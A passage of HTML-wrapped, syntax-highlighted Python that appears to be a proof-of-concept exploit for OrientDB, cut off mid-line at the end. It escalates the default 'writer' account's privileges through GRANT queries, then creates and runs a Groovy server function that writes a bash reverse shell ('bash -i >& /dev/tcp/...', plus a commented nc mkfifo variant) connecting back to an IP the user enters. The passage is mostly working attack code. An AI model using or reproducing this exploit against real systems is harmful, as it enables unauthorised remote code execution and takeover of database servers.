class=\"crayon-v\">db<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">enum_databases<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-49\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/%s:%s\/command\/%s\/sql\/-\/20?format=rid,type,version,class,graph&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-51\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv_enable<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;create&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;read&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;update&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;execute&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;delete&#8221;<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#query = &#8220;GRANT create ON database.class.ouser TO writer&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">priv <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">priv_enable<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">permission<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;GRANT&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">query<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;GRANT %s ON %s TO writer&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">priv<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">query<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;REVOKE %s ON %s FROM writer&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">priv<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">db<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">query<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">pass<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">priv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;execute&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] %s&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-71\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-72\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">priv_escalation<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2480&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-73\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Checking OrientDB Database version is greater than 2.2&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">check_version<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-77\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;GRANT&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;database.class.ouser&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;Privilege Escalation done checking enabling operations on database.function&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;GRANT&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;database.function&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;Enabled functional operations on database.function&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;GRANT&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;database.systemclusters&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;Enabling access to system clusters&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">priv1 <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">priv2 <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">priv3<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-84\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-86\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-87\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2480&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-88\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#query = &#8216;&#8221;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;most&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/0.0.0.0\/8081 0&gt;&amp;1&#8242;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute(); &#8220;,&#8221;parameters&#8221;:null&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-90\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#query = {&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:None,&#8221;name&#8221;:&#8221;ost&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;whoami&#8217;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute(); &#8220;,&#8221;parameters&#8221;:None}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-92\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">func_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">random_function_name<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-94\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">func_name<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-96\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-97\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">enum_databases<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-98\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reverse_ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">raw_input<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Enter the ip to connect back: &#8216;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-100\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">query<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;&#8216;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">func_name<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">reverse_ip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/8081 0&gt;&amp;1&#8242;;File file = new File(\\&#8221;hello.sh\\&#8221;);file.delete();file &lt;&lt; (\\&#8221;#!\/bin\/bash\\\\n\\&#8221;);file &lt;&lt; (command);def proc = \\&#8221;bash hello.sh\\&#8221;.execute();&#8221;,&#8221;parameters&#8221;:null}&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#query = &#8216;{&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;&#8216;+func_name+'&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 0.0.0.0 8081 &gt;\/tmp\/f&#8217; u000a File file = new File(&#8220;hello.sh&#8221;)u000a&nbsp;&nbsp;&nbsp;&nbsp; file.delete()&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; u000a&nbsp;&nbsp;&nbsp;&nbsp; file &lt;&lt; (&#8220;#!\/bin\/bash&#8221;)u000a&nbsp;&nbsp;&nbsp;&nbsp; file &lt;&lt; (command)n&nbsp;&nbsp;&nbsp;&nbsp;def proc = &#8220;bash hello.sh&#8221;.execute() &#8220;,&#8221;parameters&#8221;:null}&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#query = {&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:None,&#8221;name&#8221;:&#8221;lllasd&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/0.0.0.0\/8081 0&gt;&amp;1&#8217;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute();&#8221;,&#8221;parameters&#8221;:None}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s:%s\/document\/%s\/-1:-1&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">query<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-105\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">201<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-107\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.status_code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.json()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-110\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">func_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-k\">json<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;@rid&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">strip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;#&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print func_id<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-113\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Exploitation successful, get ready for your shell.Executing %s&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">func_name<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-115\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s:%s\/function\/%s\/%s&#8221;<\/span><span 